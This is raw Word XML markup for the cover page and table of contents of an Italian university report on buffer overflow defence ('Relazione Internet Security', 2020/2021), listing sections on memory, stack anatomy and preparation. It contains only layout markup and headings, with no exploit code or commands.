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5960080" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="918135147"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="04BC057A" w14:textId="3C9781D6" w:rsidR="004D62CA" w:rsidRDefault="004D62CA"/>
        <w:p w14:paraId="01D2454E" w14:textId="491B0BEC" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51F99487" wp14:editId="6EC3F18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igura a mano libera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A644D8B" w14:textId="6B0DE2BC" w:rsidR="004D62CA" w:rsidRDefault="00AF62C8" w:rsidP="004D62CA">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:sdt>
                                    <w:sdtPr>
                                      <w:rPr>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D62CA">
                                        <w:rPr>
                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                          <w:sz w:val="72"/>
                                          <w:szCs w:val="72"/>
                                        </w:rPr>
                                        <w:t>Relazione Internet Security</w:t>
                                      </w:r>
                                    </w:sdtContent>
                                  </w:sdt>
                                </w:p>
                                <w:p w14:paraId="0EC03545" w14:textId="5BF79379" w:rsidR="004D62CA" w:rsidRDefault="004D62CA" w:rsidP="004D62CA">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                    <w:t>A.A. 2020/2021</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="914400" tIns="1097280" rIns="1097280" bIns="1097280" anchor="b" anchorCtr="0" upright="1">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="127" name="Figura a mano libera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1F99487" id="Grup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">
                    <o:lock v:ext="edit" aspectratio="t"/>
                    <v:shape id="Figura a mano libera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A644D8B" w14:textId="6B0DE2BC" w:rsidR="004D62CA" w:rsidRDefault="00AF62C8" w:rsidP="004D62CA">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                            </w:pPr>
                            <w:sdt>
                              <w:sdtPr>
                                <w:rPr>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:alias w:val="Tito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D62CA">
                                  <w:rPr>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="72"/>
                                    <w:szCs w:val="72"/>
                                  </w:rPr>
                                  <w:t>Relazione Internet Security</w:t>
                                </w:r>
                              </w:sdtContent>
                            </w:sdt>
                          </w:p>
                          <w:p w14:paraId="0EC03545" w14:textId="5BF79379" w:rsidR="004D62CA" w:rsidRDefault="004D62CA" w:rsidP="004D62CA">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                              <w:t>A.A. 2020/2021</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                    <v:shape id="Figura a mano libera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E15DD39" wp14:editId="57D4C66C">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionH>
                    <wp:positionV relativeFrom="margin">
                      <wp:align>bottom</wp:align>
                    </wp:positionV>
                    <wp:extent cx="5753100" cy="146304"/>
                    <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                    <wp:wrapSquare wrapText="bothSides"/>
                    <wp:docPr id="128" name="Casella di tes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F91D4" w14:textId="226FC3E1" w:rsidR="004D62CA" w:rsidRDefault="00AF62C8">
                                <w:pPr>
                                  <w:pStyle w:val="Nessunaspaziatura"/>
                                  <w:rPr>
                                    <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                    <w:sz w:val="18"/>
                                    <w:szCs w:val="18"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>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EndPr/>
                                  <w:sdtContent>
                                    <w:r w:rsidR="004D62CA">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                        <w:sz w:val="18"/>
                                        <w:szCs w:val="18"/>
                                      </w:rPr>
                                      <w:t>Matricola: X81001007</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                      <w:sz w:val="18"/>
                                      <w:szCs w:val="18"/>
                                    </w:rPr>
                                    <w:alias w:val="Indirizzi"/>
                                    <w:tag w:val=""/>
                                    <w:id w:val="-1023088507"/>
                                    <w:showingPlcHdr/>
                                    <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyAddress[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                    <w:text/>
                                  </w:sdtPr>
                                  <w:sdtEndPr/>
                                  <w:sdtContent>
                                    <w:r w:rsidR="004D62CA">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E15DD39" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Casella di tes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XNi7&#10;OIoCAABwBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA&#10;3h8InNcAAAAEAQAADwAAAAAAAAAAAAAAAADkBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA&#10;8wAAAOgFAAAAAA==&#10;" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t" inset="1in,0,86.4pt,0">
                      <w:txbxContent>
                        <w:p w14:paraId="64FF91D4" w14:textId="226FC3E1" w:rsidR="004D62CA" w:rsidRDefault="00AF62C8">
                          <w:pPr>
                            <w:pStyle w:val="Nessunaspaziatura"/>
                            <w:rPr>
                              <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                <w:sz w:val="18"/>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:alias w:val="Società"/>
                              <w:tag w:val=""/>
                              <w:id w:val="-1880927279"/>
                              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties' " w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                              <w:text/>
                            </w:sdtPr>
                            <w:sdtEndPr/>
                            <w:sdtContent>
                              <w:r w:rsidR="004D62CA">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                  <w:sz w:val="18"/>
                                  <w:szCs w:val="18"/>
                                </w:rPr>
                                <w:t>Matricola: X81001007</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                <w:sz w:val="18"/>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:alias w:val="Indirizzi"/>
                              <w:tag w:val=""/>
                              <w:id w:val="-1023088507"/>
                              <w:showingPlcHdr/>
                              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyAddress[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                              <w:text/>
                            </w:sdtPr>
                            <w:sdtEndPr/>
                            <w:sdtContent>
                              <w:r w:rsidR="004D62CA">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8CCFAAC" wp14:editId="0AB95F5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sella di tes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B8A6508" w14:textId="3A9FC40D" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
                                    <w:pPr>
                                      <w:pStyle w:val="Nessunaspaziatura"/>
                                      <w:spacing w:before="40" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Buffer OVERFLOW (Difesa)</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752B6C7" w14:textId="39BDAFB6" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
                                    <w:pPr>
                                      <w:pStyle w:val="Nessunaspaziatura"/>
                                      <w:spacing w:before="40" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                      <w:t>STEFANO LEONE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8CCFAAC" id="Casella di tes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Ft4XaGKAgAAcA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472C4" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:alias w:val="Sottotito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B8A6508" w14:textId="3A9FC40D" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
                              <w:pPr>
                                <w:pStyle w:val="Nessunaspaziatura"/>
                                <w:spacing w:before="40" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Buffer OVERFLOW (Difesa)</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:alias w:val="Autore"/>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752B6C7" w14:textId="39BDAFB6" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
                              <w:pPr>
                                <w:pStyle w:val="Nessunaspaziatura"/>
                                <w:spacing w:before="40" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                                <w:t>STEFANO LEONE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48C6C8C" wp14:editId="1A2CF0B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ttango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it-IT"/>
                                    <w:storeMappedDataAs w:val="dateTime"/>
                                    <w:calendar w:val="gregorian"/>
                                  </w:date>
                                </w:sdtPr>
                                <w:sdtEndPr/>
                                <w:sdtContent>
                                  <w:p w14:paraId="4B3AC616" w14:textId="5AAEDEA5" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
                                    <w:pPr>
                                      <w:pStyle w:val="Nessunaspaziatura"/>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8C6C8C" id="Rettango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sfinAIAAJE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BzwsfinAIAAJE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Ann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it-IT"/>
                              <w:storeMappedDataAs w:val="dateTime"/>
                              <w:calendar w:val="gregorian"/>
                            </w:date>
                          </w:sdtPr>
                          <w:sdtEndPr/>
                          <w:sdtContent>
                            <w:p w14:paraId="4B3AC616" w14:textId="5AAEDEA5" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
                              <w:pPr>
                                <w:pStyle w:val="Nessunaspaziatura"/>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id w:val="72252712"/>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39A4347A" w14:textId="3B7D4B5C" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Titolosommario"/>
          </w:pPr>
          <w:r>
            <w:t>Sommario</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2806F77D" w14:textId="56B47623" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc76047752" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Introduzione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E5132E1" w14:textId="75001424" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047753" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Buffer Overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C19AB9D" w14:textId="66DF60FD" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047754" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Cosa vedremo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FD9A9FB" w14:textId="5961549D" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047755" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Tools utilizzati</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C5AFD70" w14:textId="6A6149D1" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047756" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Memoria e Stack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29B9AA40" w14:textId="78C56800" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047757" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Anatomia della memoria</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52C516B1" w14:textId="454F964D" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047758" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Anatomia Stack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E045C0A" w14:textId="03DB921A" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047759" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Conservazione dati in memoria</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="384BE05F" w14:textId="1A277681" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047760" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Preparazione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
